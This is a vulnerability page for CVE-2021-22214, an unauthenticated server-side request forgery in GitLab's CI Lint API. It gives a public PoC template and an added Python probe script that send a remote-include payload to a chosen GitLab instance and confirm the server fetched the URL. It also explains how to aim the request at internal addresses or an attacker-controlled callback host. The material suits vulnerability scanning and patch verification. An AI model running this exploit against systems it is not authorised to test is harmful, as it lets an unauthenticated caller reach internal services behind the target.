CVE-2021-22214: Unauthenticated Gitlab SSRF - CI Lint API

Date: 2025-09-01 | Affected software: GitLab CE/EE (listed as unknown in the page metadata; see the description) | PoC: public

Vulnerability description

A Server-Side Request Forgery (SSRF) vulnerability in GitLab CE/EE 13.10.0 through 13.10.3, 13.9.0 through 13.9.6, and 13.8.0 through 13.8.8 allows an attacker to make the application perform requests to internal services. The CI Lint API (POST /api/v4/ci/lint) accepts a pipeline configuration without authentication in the affected versions; when the request sets include_merged_yaml to true, the server resolves every include: remote: entry in that configuration by fetching the URL itself, so the caller chooses the destination. The PoC below uses a public host as the include target and matches the lint error GitLab returns after attempting the fetch ("does not have valid YAML syntax" or "could not be fetched"), which proves only that the instance makes outbound requests on behalf of an unauthenticated caller. To demonstrate reach into the internal network, point the remote include at an internal address or at a callback host you control and confirm the inbound request there.

PoC code [public]

id: CVE-2021-22214

info:
  name: Unauthenticated Gitlab SSRF - CI Lint API
  author: mumu0215
  severity: high
  description: |-
    A Server-Side Request Forgery (SSRF) vulnerability in GitLab CE/EE 13.10.0 through 13.10.3, 13.9.0 through 13.9.6, and 13.8.0 through 13.8.8 allows an attacker to make the application perform requests to internal services.
  reference:
    - https://gitlab.com/gitlab-org/gitlab/-/issues/292243
    - https://hackerone.com/reports/1122315
  tags: cve,cve2021,gitlab,ssrf
  created: 2021/04/20

rules:
  r0:
    request:
      method: POST
      path: /api/v4/ci/lint
      headers:
        Content-Type: application/json
      # include_merged_yaml makes the server resolve the remote include, i.e. fetch the URL.
      # baidu.com is only a public placeholder; use an internal or callback address to prove reach.
      body: |
        {"include_merged_yaml": true, "content": "include:\n  remote: http://baidu.com/api/v1/targets/?test.yml"}
    # A match means GitLab attempted the fetch: linting fails with a YAML or fetch error for the included file.
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") || response.body.bcontains(b"could not be fetched"))
expression: r0()
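The same check as a standalone script, added here as an example and not part of the page's PoC. It builds the lint payload, sends it to a GitLab base URL and a callback URL supplied on the command line (both are assumptions), and classifies the reply the way the expression above does, with a separate outcome for an endpoint that refuses the unauthenticated request. The sample responses embedded in the block are constructed for offline testing, not captured from a real instance.

```python
"""
Probe for the GitLab CI Lint SSRF (CVE-2021-22214).

Added example, not the page's PoC. The GitLab base URL and the callback
URL are supplied on the command line (both are assumptions); the replies
in SAMPLE_RESPONSES are constructed for offline testing.
"""
import json
import sys
import urllib.error
import urllib.request

LINT_PATH = "/api/v4/ci/lint"

# Lint errors GitLab emits only after it has tried to fetch the remote include
FETCH_ATTEMPTED_MARKERS = (
    "does not have valid YAML syntax",
    "could not be fetched",
)


def build_lint_payload(remote_url: str) -> dict:
    """Pipeline config with a remote include; include_merged_yaml makes the
    server resolve (fetch) that include while linting."""
    ci_config = "include:\n  remote: " + remote_url + "\n"
    return {"include_merged_yaml": True, "content": ci_config}


def classify_response(status: int, content_type: str, body: bytes) -> str:
    """Classify a lint response.

    'fetch_attempted' - GitLab contacted the remote URL (SSRF confirmed)
    'rejected'        - endpoint refused the unauthenticated request
    'inconclusive'    - anything else (valid config, non-JSON, other error)
    """
    if status in (401, 403):
        return "rejected"
    if status != 200 or "json" not in content_type.lower():
        return "inconclusive"
    try:
        data = json.loads(body)
    except ValueError:
        return "inconclusive"
    if data.get("status") != "invalid":
        return "inconclusive"
    errors = " ".join(str(err) for err in data.get("errors", []))
    if any(marker in errors for marker in FETCH_ATTEMPTED_MARKERS):
        return "fetch_attempted"
    return "inconclusive"


def probe(base_url: str, remote_url: str, timeout: float = 15.0) -> str:
    """POST the payload to a live instance and classify the reply."""
    req = urllib.request.Request(
        base_url.rstrip("/") + LINT_PATH,
        data=json.dumps(build_lint_payload(remote_url)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.headers.get("Content-Type", ""), resp.read())
    except urllib.error.HTTPError as exc:
        # 401/403/404 land here; classify them the same way
        return classify_response(exc.code, exc.headers.get("Content-Type", ""), exc.read())


# Constructed sample replies (not captured from a real instance)
SAMPLE_RESPONSES = {
    "vulnerable": (200, "application/json",
                   b'{"status":"invalid","errors":["Included file `http://10.0.0.5/x.yml` '
                   b'does not have valid YAML syntax!"],"warnings":[]}'),
    "valid_config": (200, "application/json",
                     b'{"status":"valid","errors":[],"warnings":[]}'),
    "unauthenticated": (401, "application/json", b'{"message":"401 Unauthorized"}'),
    "not_gitlab": (200, "text/html", b"<html>ok</html>"),
}


def run_offline_check() -> dict:
    """Run the classifier over the constructed samples."""
    return {name: classify_response(*resp) for name, resp in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(run_offline_check())
        sys.exit("usage: probe.py <gitlab-base-url> <callback-url>")
    print(probe(sys.argv[1], sys.argv[2]))
```

Run it as `python3 probe.py https://gitlab.example.internal http://callback.example.test/x.yml`; a result of `fetch_attempted` means the instance tried to retrieve the include, and a hit on the callback host is the evidence that the request actually left the server. `rejected` means the endpoint does not serve unauthenticated callers, so this PoC does not apply.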